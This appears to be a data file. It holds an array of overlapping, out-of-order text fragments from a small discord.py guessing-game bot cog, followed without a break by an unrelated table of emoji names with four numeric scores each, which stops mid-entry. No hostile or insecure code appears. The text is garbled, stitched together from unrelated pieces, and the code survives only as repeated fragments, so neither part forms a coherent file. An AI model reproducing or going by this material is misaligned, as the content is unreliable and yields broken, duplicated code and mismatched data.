[ "with nothing at stake.\"): def __init__(self, bot): self.bot = bot async def tick(self,", "async def free_guess_now(self, ctx, num: int): answer = random.randint(1, 9) correct = num", "@commands.command( name='free_guess_now', help='Guess a random number from 1-9', ) async def free_guess_now(self, ctx,", "ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess a random number from 1-9', )", "class GuessingGame(BaseCog, name=\"Free guessing game -- with nothing at stake.\"): def __init__(self, bot):", "if correct else '\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command( name='free_guess_now',", "help='Guess a random number between 1-99 or a provided range.' ) async def", "a random number from 1-9', ) async def free_guess_now(self, ctx, num: int): answer", "import typing from base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing game", "1-9', ) async def free_guess_now(self, ctx, num: int): answer = random.randint(1, 9) correct", "try: await ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess a random number from", ") async def free_guess(self, ctx, start: typing.Optional[int] = 1, end: typing.Optional[int]= 99): await", "GuessingGame(BaseCog, name=\"Free guessing game -- with nothing at stake.\"): def __init__(self, bot): self.bot", "except asyncio.TimeoutError: return await ctx.reply(f'Sorry, you took too long. The answer is {answer}')", "except discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess a random number from 1-9', ) async", "f'Incorrect. The answer is {answer}', mention_author=True) @commands.command( name='free_guess', help='Guess a random number between", "random.randint(start, end) try: guess = await self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError: return await", "return await ctx.reply(f'Sorry, you took too long. The answer is {answer}') correct =", "import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing game -- with nothing at", "else f'Incorrect. The answer is {answer}', mention_author=True) @commands.command( name='free_guess', help='Guess a random number", "ctx.reply(f'Sorry, you took too long. The answer is {answer}') correct = int(guess.content) ==", "import discord import typing from base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free", "typing.Optional[int] = 1, end: typing.Optional[int]= 99): await ctx.send(f'Guess a number between {start}-{end}') def", "random import asyncio from discord.ext import commands import discord import typing from base", "ctx.send(f'Guess a number between {start}-{end}') def is_correct(m): return m.author == ctx.message.author and m.content.isdigit()", "The answer is {answer}') correct = int(guess.content) == answer await self.tick(ctx, correct) await", "9) correct = num == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct", "between {start}-{end}') def is_correct(m): return m.author == ctx.message.author and m.content.isdigit() answer = random.randint(start,", "and m.content.isdigit() answer = random.randint(start, end) try: guess = await self.bot.wait_for('message', check=is_correct, timeout=5.0)", "correct): emoji = '\\N{WHITE HEAVY CHECK MARK}' if correct else '\\N{CROSS MARK}' try:", "= '\\N{WHITE HEAVY CHECK MARK}' if correct else '\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji)", "= num == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else f'Incorrect.", "ctx.reply('Correct!' if correct else f'Incorrect. The answer is {answer}', mention_author=True) def setup(bot): bot.add_cog(GuessingGame(bot))", "= 1, end: typing.Optional[int]= 99): await ctx.send(f'Guess a number between {start}-{end}') def is_correct(m):", "await ctx.send(f'Guess a number between {start}-{end}') def is_correct(m): return m.author == ctx.message.author and", "MARK}' try: await ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess a random number", "between 1-99 or a provided range.' ) async def free_guess(self, ctx, start: typing.Optional[int]", "random.randint(1, 9) correct = num == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if", "correct else '\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess", "== ctx.message.author and m.content.isdigit() answer = random.randint(start, end) try: guess = await self.bot.wait_for('message',", "or a provided range.' ) async def free_guess(self, ctx, start: typing.Optional[int] = 1,", "= bot async def tick(self, ctx, correct): emoji = '\\N{WHITE HEAVY CHECK MARK}'", "import commands import discord import typing from base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class", "m.content.isdigit() answer = random.randint(start, end) try: guess = await self.bot.wait_for('message', check=is_correct, timeout=5.0) except", "= random.randint(1, 9) correct = num == answer await self.tick(ctx, correct) await ctx.reply('Correct!'", "range.' ) async def free_guess(self, ctx, start: typing.Optional[int] = 1, end: typing.Optional[int]= 99):", "int): answer = random.randint(1, 9) correct = num == answer await self.tick(ctx, correct)", "mention_author=True) @commands.command( name='free_guess', help='Guess a random number between 1-99 or a provided range.'", "correct = num == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else", "number between {start}-{end}') def is_correct(m): return m.author == ctx.message.author and m.content.isdigit() answer =", "self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError: return await ctx.reply(f'Sorry, you took too long. The", "too long. The answer is {answer}') correct = int(guess.content) == answer await self.tick(ctx,", "correct) await ctx.reply('Correct!' if correct else f'Incorrect. The answer is {answer}', mention_author=True) def", "took too long. The answer is {answer}') correct = int(guess.content) == answer await", "name='free_guess', help='Guess a random number between 1-99 or a provided range.' ) async", "answer = random.randint(1, 9) correct = num == answer await self.tick(ctx, correct) await", "typing from base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing game --", "name=\"Free guessing game -- with nothing at stake.\"): def __init__(self, bot): self.bot =", "await self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError: return await ctx.reply(f'Sorry, you took too long.", "bot): self.bot = bot async def tick(self, ctx, correct): emoji = '\\N{WHITE HEAVY", "ctx.message.author and m.content.isdigit() answer = random.randint(start, end) try: guess = await self.bot.wait_for('message', check=is_correct,", "check=is_correct, timeout=5.0) except asyncio.TimeoutError: return await ctx.reply(f'Sorry, you took too long. The answer", "free_guess(self, ctx, start: typing.Optional[int] = 1, end: typing.Optional[int]= 99): await ctx.send(f'Guess a number", "long. The answer is {answer}') correct = int(guess.content) == answer await self.tick(ctx, correct)", "__init__(self, bot): self.bot = bot async def tick(self, ctx, correct): emoji = '\\N{WHITE", "number between 1-99 or a provided range.' ) async def free_guess(self, ctx, start:", "timeout=5.0) except asyncio.TimeoutError: return await ctx.reply(f'Sorry, you took too long. The answer is", "-- with nothing at stake.\"): def __init__(self, bot): self.bot = bot async def", "a random number between 1-99 or a provided range.' ) async def free_guess(self,", "number from 1-9', ) async def free_guess_now(self, ctx, num: int): answer = random.randint(1,", "base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing game -- with nothing", "self.tick(ctx, correct) await ctx.reply('Correct!' if correct else f'Incorrect. The answer is {answer}', mention_author=True)", "answer is {answer}', mention_author=True) @commands.command( name='free_guess', help='Guess a random number between 1-99 or", "{answer}', mention_author=True) @commands.command( name='free_guess', help='Guess a random number between 1-99 or a provided", "= random.randint(start, end) try: guess = await self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError: return", "answer = random.randint(start, end) try: guess = await self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError:", "{answer}') correct = int(guess.content) == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct", "asyncio from discord.ext import commands import discord import typing from base import BaseCog", "from discord.ext import commands import discord import typing from base import BaseCog #", "tick(self, ctx, correct): emoji = '\\N{WHITE HEAVY CHECK MARK}' if correct else '\\N{CROSS", "HEAVY CHECK MARK}' if correct else '\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji) except discord.HTTPException:", "nothing at stake.\"): def __init__(self, bot): self.bot = bot async def tick(self, ctx,", "async def tick(self, ctx, correct): emoji = '\\N{WHITE HEAVY CHECK MARK}' if correct", "pass @commands.command( name='free_guess_now', help='Guess a random number from 1-9', ) async def free_guess_now(self,", ") async def free_guess_now(self, ctx, num: int): answer = random.randint(1, 9) correct =", "if correct else f'Incorrect. The answer is {answer}', mention_author=True) @commands.command( name='free_guess', help='Guess a", "end) try: guess = await self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError: return await ctx.reply(f'Sorry,", "BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing game -- with nothing at stake.\"):", "try: guess = await self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError: return await ctx.reply(f'Sorry, you", "provided range.' ) async def free_guess(self, ctx, start: typing.Optional[int] = 1, end: typing.Optional[int]=", "The answer is {answer}', mention_author=True) @commands.command( name='free_guess', help='Guess a random number between 1-99", "is_correct(m): return m.author == ctx.message.author and m.content.isdigit() answer = random.randint(start, end) try: guess", "def free_guess(self, ctx, start: typing.Optional[int] = 1, end: typing.Optional[int]= 99): await ctx.send(f'Guess a", "is {answer}', mention_author=True) @commands.command( name='free_guess', help='Guess a random number between 1-99 or a", "answer is {answer}') correct = int(guess.content) == answer await self.tick(ctx, correct) await ctx.reply('Correct!'", "a provided range.' ) async def free_guess(self, ctx, start: typing.Optional[int] = 1, end:", "https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing game -- with nothing at stake.\"): def __init__(self,", "from base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing game -- with", "async def free_guess(self, ctx, start: typing.Optional[int] = 1, end: typing.Optional[int]= 99): await ctx.send(f'Guess", "'\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess a random", "= await self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError: return await ctx.reply(f'Sorry, you took too", "emoji = '\\N{WHITE HEAVY CHECK MARK}' if correct else '\\N{CROSS MARK}' try: await", "MARK}' if correct else '\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command(", "game -- with nothing at stake.\"): def __init__(self, bot): self.bot = bot async", "ctx, correct): emoji = '\\N{WHITE HEAVY CHECK MARK}' if correct else '\\N{CROSS MARK}'", "commands import discord import typing from base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog,", "answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else f'Incorrect. The answer is", "self.bot = bot async def tick(self, ctx, correct): emoji = '\\N{WHITE HEAVY CHECK", "m.author == ctx.message.author and m.content.isdigit() answer = random.randint(start, end) try: guess = await", "help='Guess a random number from 1-9', ) async def free_guess_now(self, ctx, num: int):", "def __init__(self, bot): self.bot = bot async def tick(self, ctx, correct): emoji =", "stake.\"): def __init__(self, bot): self.bot = bot async def tick(self, ctx, correct): emoji", "from 1-9', ) async def free_guess_now(self, ctx, num: int): answer = random.randint(1, 9)", "guessing game -- with nothing at stake.\"): def __init__(self, bot): self.bot = bot", "def free_guess_now(self, ctx, num: int): answer = random.randint(1, 9) correct = num ==", "end: typing.Optional[int]= 99): await ctx.send(f'Guess a number between {start}-{end}') def is_correct(m): return m.author", "random number from 1-9', ) async def free_guess_now(self, ctx, num: int): answer =", "= int(guess.content) == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else f'Incorrect.", "await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else f'Incorrect. The answer is {answer}',", "1, end: typing.Optional[int]= 99): await ctx.send(f'Guess a number between {start}-{end}') def is_correct(m): return", "is {answer}') correct = int(guess.content) == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if", "correct = int(guess.content) == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else", "free_guess_now(self, ctx, num: int): answer = random.randint(1, 9) correct = num == answer", "await ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess a random number from 1-9',", "num: int): answer = random.randint(1, 9) correct = num == answer await self.tick(ctx,", "ctx, num: int): answer = random.randint(1, 9) correct = num == answer await", "a number between {start}-{end}') def is_correct(m): return m.author == ctx.message.author and m.content.isdigit() answer", "correct) await ctx.reply('Correct!' if correct else f'Incorrect. The answer is {answer}', mention_author=True) @commands.command(", "import random import asyncio from discord.ext import commands import discord import typing from", "def is_correct(m): return m.author == ctx.message.author and m.content.isdigit() answer = random.randint(start, end) try:", "== answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else f'Incorrect. The answer", "ctx, start: typing.Optional[int] = 1, end: typing.Optional[int]= 99): await ctx.send(f'Guess a number between", "typing.Optional[int]= 99): await ctx.send(f'Guess a number between {start}-{end}') def is_correct(m): return m.author ==", "CHECK MARK}' if correct else '\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji) except discord.HTTPException: pass", "@commands.command( name='free_guess', help='Guess a random number between 1-99 or a provided range.' )", "await ctx.reply('Correct!' if correct else f'Incorrect. The answer is {answer}', mention_author=True) def setup(bot):", "else '\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji) except discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess a", "correct else f'Incorrect. The answer is {answer}', mention_author=True) @commands.command( name='free_guess', help='Guess a random", "import asyncio from discord.ext import commands import discord import typing from base import", "name='free_guess_now', help='Guess a random number from 1-9', ) async def free_guess_now(self, ctx, num:", "await ctx.reply('Correct!' if correct else f'Incorrect. The answer is {answer}', mention_author=True) @commands.command( name='free_guess',", "int(guess.content) == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else f'Incorrect. The", "num == answer await self.tick(ctx, correct) await ctx.reply('Correct!' if correct else f'Incorrect. The", "discord.HTTPException: pass @commands.command( name='free_guess_now', help='Guess a random number from 1-9', ) async def", "guess = await self.bot.wait_for('message', check=is_correct, timeout=5.0) except asyncio.TimeoutError: return await ctx.reply(f'Sorry, you took", "start: typing.Optional[int] = 1, end: typing.Optional[int]= 99): await ctx.send(f'Guess a number between {start}-{end}')", "bot async def tick(self, ctx, correct): emoji = '\\N{WHITE HEAVY CHECK MARK}' if", "# https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing game -- with nothing at stake.\"): def", "at stake.\"): def __init__(self, bot): self.bot = bot async def tick(self, ctx, correct):", "asyncio.TimeoutError: return await ctx.reply(f'Sorry, you took too long. The answer is {answer}') correct", "def tick(self, ctx, correct): emoji = '\\N{WHITE HEAVY CHECK MARK}' if correct else", "random number between 1-99 or a provided range.' ) async def free_guess(self, ctx,", "99): await ctx.send(f'Guess a number between {start}-{end}') def is_correct(m): return m.author == ctx.message.author", "discord.ext import commands import discord import typing from base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py", "1-99 or a provided range.' ) async def free_guess(self, ctx, start: typing.Optional[int] =", "await ctx.reply(f'Sorry, you took too long. The answer is {answer}') correct = int(guess.content)", "discord import typing from base import BaseCog # https://github.com/Rapptz/discord.py/blob/v1.7.2/examples/guessing_game.py class GuessingGame(BaseCog, name=\"Free guessing", "you took too long. The answer is {answer}') correct = int(guess.content) == answer", "{start}-{end}') def is_correct(m): return m.author == ctx.message.author and m.content.isdigit() answer = random.randint(start, end)", "return m.author == ctx.message.author and m.content.isdigit() answer = random.randint(start, end) try: guess =", "ctx.reply('Correct!' if correct else f'Incorrect. The answer is {answer}', mention_author=True) @commands.command( name='free_guess', help='Guess", "'\\N{WHITE HEAVY CHECK MARK}' if correct else '\\N{CROSS MARK}' try: await ctx.message.add_reaction(emoji) except" ]
[ "import os import errno s = socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as exc: s.send(b'abc')", "from __future__ import division from __future__ import print_function import unittest from trollius import", "= socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as", "os import errno s = socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno,", "from __future__ import print_function import unittest from trollius import py33_exceptions class TestWrapErrors(unittest.TestCase): def", "division from __future__ import print_function import unittest from trollius import py33_exceptions class TestWrapErrors(unittest.TestCase):", "-*- coding: utf-8 -*- \"\"\" Tests for py33_exceptions. \"\"\" from __future__ import absolute_import", "# -*- coding: utf-8 -*- \"\"\" Tests for py33_exceptions. \"\"\" from __future__ import", "py33_exceptions. \"\"\" from __future__ import absolute_import from __future__ import division from __future__ import", "__future__ import print_function import unittest from trollius import py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self):", "for py33_exceptions. \"\"\" from __future__ import absolute_import from __future__ import division from __future__", "s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send, b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) if __name__", "__future__ import absolute_import from __future__ import division from __future__ import print_function import unittest", "s = socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError)", "import unittest from trollius import py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import", "errno.EBADF) with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send, b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) if __name__ == '__main__':", "# https://github.com/jamadden/trollius/issues/17 import socket import os import errno s = socket.socket() os.close(s.fileno()) with", "unittest from trollius import py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket", "from __future__ import absolute_import from __future__ import division from __future__ import print_function import", "__future__ import division from __future__ import print_function import unittest from trollius import py33_exceptions", "import print_function import unittest from trollius import py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): #", "import errno s = socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF)", "with self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send, b'abc')", "self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send, b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) if __name__ ==", "import division from __future__ import print_function import unittest from trollius import py33_exceptions class", "self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send, b'abc') self.assertEqual(exc.exception.errno,", "with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send, b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) if __name__ == '__main__': unittest.main()", "absolute_import from __future__ import division from __future__ import print_function import unittest from trollius", "TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket import os import errno s =", "py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket import os import errno", "coding: utf-8 -*- \"\"\" Tests for py33_exceptions. \"\"\" from __future__ import absolute_import from", "\"\"\" from __future__ import absolute_import from __future__ import division from __future__ import print_function", "socket import os import errno s = socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as exc:", "errno s = socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with", "from trollius import py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket import", "os.close(s.fileno()) with self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send,", "as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send, b'abc') self.assertEqual(exc.exception.errno, errno.EBADF)", "import absolute_import from __future__ import division from __future__ import print_function import unittest from", "utf-8 -*- \"\"\" Tests for py33_exceptions. \"\"\" from __future__ import absolute_import from __future__", "trollius import py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket import os", "socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as exc:", "-*- \"\"\" Tests for py33_exceptions. \"\"\" from __future__ import absolute_import from __future__ import", "class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket import os import errno s", "test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket import os import errno s = socket.socket() os.close(s.fileno())", "import py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket import os import", "import socket import os import errno s = socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error) as", "print_function import unittest from trollius import py33_exceptions class TestWrapErrors(unittest.TestCase): def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17", "https://github.com/jamadden/trollius/issues/17 import socket import os import errno s = socket.socket() os.close(s.fileno()) with self.assertRaises(socket.error)", "exc: s.send(b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) with self.assertRaises(OSError) as exc: py33_exceptions.wrap_error(s.send, b'abc') self.assertEqual(exc.exception.errno, errno.EBADF) if", "def test_ebadf_wrapped_to_OSError(self): # https://github.com/jamadden/trollius/issues/17 import socket import os import errno s = socket.socket()", "\"\"\" Tests for py33_exceptions. \"\"\" from __future__ import absolute_import from __future__ import division", "Tests for py33_exceptions. \"\"\" from __future__ import absolute_import from __future__ import division from" ]
[ "0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18, 0.168, 0.1], \":running_shirt:\": [0.138,", "0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\": [0.126,", "[0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155, 0.303], \":red_apple:\": [0.251, 0.182, 0.195,", "0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\":", "0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247], \":mount_fuji:\": [0.196, 0.225, 0.253, 0.172],", "\":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177,", "0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245, 0.192, 0.034], \":gem_stone:\": [0.17300000000000001,", "0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\":", "0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\":", "\":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\": [0.171, 0.155, 0.225, 0.159], \":open_book:\": [0.196, 0.207,", "0.177, 0.27, 0.262], \":Gemini:\": [0.228, 0.132, 0.262, 0.177], \":hibiscus:\": [0.085, 0.218, 0.316, 0.151],", "\":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243,", "0.046, 0.315, 0.141], \":scroll:\": [0.254, 0.267, 0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191],", "0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121],", "[0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292, 0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442,", "0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\":", "0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111, 0.204], \":monkey_face:\":", "0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131], \":Sagittarius:\":", "0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158, 0.205], \":megaphone:\":", "0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\":", "0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168], \":three_o’clock:\":", "0.359, 0.22, 0.19], \":radio:\": [0.187, 0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304],", "[0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215,", "0.281, 0.174], \":black_square_button:\": [0.361, 0.212, 0.235, 0.228], \":winking_face:\": [0.098, 0.053, 0.129, 0.171], \":light_bulb:\":", "[0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151,", "0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134,", "[0.16, 0.184, 0.09, 0.159], \":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25,", "0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\":", "0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17], \":tanabata_tree:\":", "\":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175,", "0.125, 0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256], \":white_medium_star:\": [0.237, 0.175, 0.29, 0.16],", "0.128, 0.212], \":sushi:\": [0.134, 0.196, 0.13699999999999998, 0.214], \":two-hump_camel:\": [0.151, 0.263, 0.131, 0.154], \":white_flower:\":", "0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\":", "0.305, 0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316],", "0.156], \":e-mail:\": [0.26, 0.225, 0.21, 0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259,", "0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307,", "0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\":", "\":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15, 0.231,", "0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107, 0.292, 0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996],", "[0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196, 0.249,", "0.382, 